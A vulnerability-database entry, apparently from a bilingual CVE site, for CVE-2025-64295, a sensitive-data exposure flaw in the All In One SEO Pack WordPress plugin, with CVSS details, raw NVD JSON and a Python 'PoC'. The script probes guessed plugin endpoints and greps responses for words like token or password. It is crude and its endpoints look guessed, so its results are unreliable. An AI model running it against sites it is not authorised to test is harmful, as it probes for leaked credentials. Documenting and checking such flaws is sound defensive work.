Security Vulnerability Report
中文
CVE-2025-64295 CVSS 6.5 MEDIUM

CVE-2025-64295

Published: 2025-12-18 08:16:14
Last Modified: 2026-04-15 00:35:42

Description

Insertion of Sensitive Information Into Sent Data vulnerability in Syed Balkhi All In One SEO Pack all-in-one-seo-pack allows Retrieve Embedded Sensitive Data.This issue affects All In One SEO Pack: from n/a through <= 4.8.6.1.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

All In One SEO Pack <= 4.8.6.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-64295 PoC - All In One SEO Pack敏感信息泄露 # 注意:此代码仅用于安全研究和防御目的 import requests from urllib.parse import urljoin def check_cve_2025_64295(target_url): """ 检测All In One SEO Pack插件是否存在敏感信息泄露漏洞 """ # 目标URL plugin_endpoints = [ '/wp-json/aioseo/v1/settings', '/wp-json/aioseo/v1/options', '/wp-admin/admin-ajax.php?action=aioseo_get_settings', '/wp-admin/admin-ajax.php?action=aioseo_fetch_data' ] results = { 'vulnerable': False, 'leaked_data': [], 'endpoints_checked': [] } session = requests.Session() for endpoint in plugin_endpoints: full_url = urljoin(target_url, endpoint) results['endpoints_checked'].append(full_url) try: # 尝试以低权限用户身份访问 response = session.get(full_url, timeout=10) if response.status_code == 200: # 检查响应中是否包含敏感信息模式 sensitive_patterns = [ 'api_key', 'secret', 'token', 'password', 'credential', 'auth', 'key', 'license' ] for pattern in sensitive_patterns: if pattern.lower() in response.text.lower(): results['vulnerable'] = True results['leaked_data'].append({ 'endpoint': full_url, 'pattern_matched': pattern }) except requests.RequestException as e: print(f"请求失败 {full_url}: {str(e)}") return results # 使用示例 if __name__ == "__main__": target = input("请输入目标URL (例如: http://example.com): ") result = check_cve_2025_64295(target) print(f"\n检测结果: {'存在漏洞' if result['vulnerable'] else '未发现漏洞'}") if result['leaked_data']: print("泄露的端点:") for item in result['leaked_data']: print(f" - {item['endpoint']} (匹配: {item['pattern_matched']})")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-64295", "sourceIdentifier": "[email protected]", "published": "2025-12-18T08:16:13.873", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Insertion of Sensitive Information Into Sent Data vulnerability in Syed Balkhi All In One SEO Pack all-in-one-seo-pack allows Retrieve Embedded Sensitive Data.This issue affects All In One SEO Pack: from n/a through <= 4.8.6.1."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-201"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/all-in-one-seo-pack/vulnerability/wordpress-all-in-one-seo-pack-plugin-4-8-6-1-sensitive-data-exposure-vulnerability?_s_id=cve", "source": "[email protected]"}]}}